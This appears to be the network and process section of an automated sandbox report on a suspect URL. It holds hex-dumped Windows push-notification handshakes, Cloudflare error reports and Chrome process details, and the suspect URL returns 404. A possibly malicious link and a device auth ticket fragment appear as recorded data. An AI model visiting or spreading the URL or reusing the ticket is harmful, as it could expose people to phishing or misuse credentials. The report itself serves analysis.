                  2024-03-07 18:13:36 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 67 2f 62 59 63 35 4f 50 69 45 6d 55 48 63 52 4c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 34 35 35 31 34 38 33 37 64 36 64 38 36 66 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 49 33 72 34 38 50 7a 2b 64 36 32 4d 44 62 6a 62 39 6d 49 4e 2b 4b 6e 71 69 4d 41 46 78 59 55 37 73 50 70 38 4f 76 58 6a 52 4d 65 67 46 53 48 48 38 2f 57 48 35 6f 51 76 6b 4c 4f 38 51 6f 7a 53 6e 4b 37 41 34 2b 4f 52 33 31 43 37 42 42 51 7a 45 72 64 73 76 4f 4f 46 62 73 55 67 67 35 54 6e 52 41 47 76 6a 44 42 36 73 63 6d 43
                  Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: g/bYc5OPiEmUHcRL.2Context: 145514837d6d86f1<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASI3r48Pz+d62MDbjb9mIN+KnqiMAFxYU7sPp8OvXjRMegFSHH8/WH5oQvkLO8QozSnK7A4+OR31C7BBQzErdsvOOFbsUgg5TnRAGvjDB6scmC
                  2024-03-07 18:13:36 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 67 2f 62 59 63 35 4f 50 69 45 6d 55 48 63 52 4c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 34 35 35 31 34 38 33 37 64 36 64 38 36 66 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: g/bYc5OPiEmUHcRL.3Context: 145514837d6d86f1<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                  2024-03-07 18:13:36 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                  Data Ascii: 202 1 CON 58
                  2024-03-07 18:13:36 UTC58INData Raw: 4d 53 2d 43 56 3a 20 36 4a 6c 53 38 36 31 43 30 55 57 4c 62 55 52 69 58 78 4c 41 68 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                  Data Ascii: MS-CV: 6JlS861C0UWLbURiXxLAhQ.0Payload parsing failed.


                  Session IDSource IPSource PortDestination IPDestination Port
                  12192.168.2.64973620.7.2.167443
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:14:00 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4b 33 6f 6a 49 4d 6a 4d 72 45 6d 34 5a 52 69 31 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 61 37 39 65 37 30 37 33 63 63 63 39 31 31 34 0d 0a 0d 0a
                  Data Ascii: CNT 1 CON 305MS-CV: K3ojIMjMrEm4ZRi1.1Context: 4a79e7073ccc9114
                  2024-03-07 18:14:00 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                  2024-03-07 18:14:00 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 4b 33 6f 6a 49 4d 6a 4d 72 45 6d 34 5a 52 69 31 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 61 37 39 65 37 30 37 33 63 63 63 39 31 31 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 49 33 72 34 38 50 7a 2b 64 36 32 4d 44 62 6a 62 39 6d 49 4e 2b 4b 6e 71 69 4d 41 46 78 59 55 37 73 50 70 38 4f 76 58 6a 52 4d 65 67 46 53 48 48 38 2f 57 48 35 6f 51 76 6b 4c 4f 38 51 6f 7a 53 6e 4b 37 41 34 2b 4f 52 33 31 43 37 42 42 51 7a 45 72 64 73 76 4f 4f 46 62 73 55 67 67 35 54 6e 52 41 47 76 6a 44 42 36 73 63 6d 43
                  Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: K3ojIMjMrEm4ZRi1.2Context: 4a79e7073ccc9114<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASI3r48Pz+d62MDbjb9mIN+KnqiMAFxYU7sPp8OvXjRMegFSHH8/WH5oQvkLO8QozSnK7A4+OR31C7BBQzErdsvOOFbsUgg5TnRAGvjDB6scmC
                  2024-03-07 18:14:00 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4b 33 6f 6a 49 4d 6a 4d 72 45 6d 34 5a 52 69 31 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 61 37 39 65 37 30 37 33 63 63 63 39 31 31 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: K3ojIMjMrEm4ZRi1.3Context: 4a79e7073ccc9114<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                  2024-03-07 18:14:00 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                  Data Ascii: 202 1 CON 58
                  2024-03-07 18:14:00 UTC58INData Raw: 4d 53 2d 43 56 3a 20 45 47 6d 54 52 2b 53 35 64 6b 47 6f 79 34 65 76 51 2b 4c 53 45 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                  Data Ascii: MS-CV: EGmTR+S5dkGoy4evQ+LSEQ.0Payload parsing failed.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.64974135.190.80.14434176C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:14:17 UTC528OUTOPTIONS /report/v3?s=NM5r6%2FZtkafO6MpGWXbgV9cGGib0UWLI1OsgU5689mUc9sGO4YDxgSvSMaaJ%2BVpzyCAe%2F1hX6tGdUh77uTzh1duVbZUtorMoF2FEM0IX6zh2s4SR11lkDGQzXVl9 HTTP/1.1
                  Host: a.nel.cloudflare.com
                  Connection: keep-alive
                  Origin: https://0xl45.ateros1.com
                  Access-Control-Request-Method: POST
                  Access-Control-Request-Headers: content-type
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-03-07 18:14:17 UTC336INHTTP/1.1 200 OK
                  Content-Length: 0
                  access-control-max-age: 86400
                  access-control-allow-methods: OPTIONS, POST
                  access-control-allow-origin: *
                  access-control-allow-headers: content-type, content-length
                  date: Thu, 07 Mar 2024 18:14:16 GMT
                  Via: 1.1 google
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.64974235.190.80.14434176C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:14:17 UTC468OUTPOST /report/v3?s=NM5r6%2FZtkafO6MpGWXbgV9cGGib0UWLI1OsgU5689mUc9sGO4YDxgSvSMaaJ%2BVpzyCAe%2F1hX6tGdUh77uTzh1duVbZUtorMoF2FEM0IX6zh2s4SR11lkDGQzXVl9 HTTP/1.1
                  Host: a.nel.cloudflare.com
                  Connection: keep-alive
                  Content-Length: 549
                  Content-Type: application/reports+json
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-03-07 18:14:17 UTC549OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 36 33 33 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 39 36 34 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 30 78 6c 34 35 2e 61 74 65 72 6f 73 31 2e 63 6f 6d 2f 4f 70 4c 7a 31 36 41 31 76 35 47 63 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 34 2e 31 31 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65
                  Data Ascii: [{"age":56339,"body":{"elapsed_time":2964,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://0xl45.ateros1.com/OpLz16A1v5Gc/","sampling_fraction":1.0,"server_ip":"104.21.24.112","status_code":404,"type":"http.error"},"type":"ne
                  2024-03-07 18:14:18 UTC168INHTTP/1.1 200 OK
                  Content-Length: 0
                  date: Thu, 07 Mar 2024 18:14:17 GMT
                  Via: 1.1 google
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session IDSource IPSource PortDestination IPDestination Port
                  15192.168.2.64974320.7.2.167443
                  TimestampBytes transferredDirectionData
                  2024-03-07 18:14:26 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 43 65 37 53 58 57 62 43 35 30 79 6c 32 6c 69 73 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 61 62 62 36 31 31 61 63 37 31 65 66 63 61 36 0d 0a 0d 0a
                  Data Ascii: CNT 1 CON 305MS-CV: Ce7SXWbC50yl2lis.1Context: eabb611ac71efca6
                  2024-03-07 18:14:26 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                  2024-03-07 18:14:26 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 43 65 37 53 58 57 62 43 35 30 79 6c 32 6c 69 73 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 61 62 62 36 31 31 61 63 37 31 65 66 63 61 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 49 33 72 34 38 50 7a 2b 64 36 32 4d 44 62 6a 62 39 6d 49 4e 2b 4b 6e 71 69 4d 41 46 78 59 55 37 73 50 70 38 4f 76 58 6a 52 4d 65 67 46 53 48 48 38 2f 57 48 35 6f 51 76 6b 4c 4f 38 51 6f 7a 53 6e 4b 37 41 34 2b 4f 52 33 31 43 37 42 42 51 7a 45 72 64 73 76 4f 4f 46 62 73 55 67 67 35 54 6e 52 41 47 76 6a 44 42 36 73 63 6d 43
                  Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: Ce7SXWbC50yl2lis.2Context: eabb611ac71efca6<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASI3r48Pz+d62MDbjb9mIN+KnqiMAFxYU7sPp8OvXjRMegFSHH8/WH5oQvkLO8QozSnK7A4+OR31C7BBQzErdsvOOFbsUgg5TnRAGvjDB6scmC
                  2024-03-07 18:14:26 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 43 65 37 53 58 57 62 43 35 30 79 6c 32 6c 69 73 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 61 62 62 36 31 31 61 63 37 31 65 66 63 61 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: Ce7SXWbC50yl2lis.3Context: eabb611ac71efca6<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                  2024-03-07 18:14:26 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                  Data Ascii: 202 1 CON 58
                  2024-03-07 18:14:26 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4b 74 2b 68 76 4e 62 75 7a 30 43 75 31 44 48 36 6f 35 33 57 66 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                  Data Ascii: MS-CV: Kt+hvNbuz0Cu1DH6o53WfQ.0Payload parsing failed.


                  Click to jump to process

                  Click to jump to process

                  Click to jump to process

                  Target ID:0
                  Start time:19:13:08
                  Start date:07/03/2024
                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                  Imagebase:0x7ff684c40000
                  File size:3'242'272 bytes
                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:false

                  Target ID:2
                  Start time:19:13:09
                  Start date:07/03/2024
                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2204,i,10409208665149905087,14052384433586685165,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Imagebase:0x7ff684c40000
                  File size:3'242'272 bytes
                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:false

                  Target ID:3
                  Start time:19:13:13
                  Start date:07/03/2024
                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "https://0xl45.ateros1.com/OpLz16A1v5Gc/
                  Imagebase:0x7ff684c40000
                  File size:3'242'272 bytes
                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  No disassembly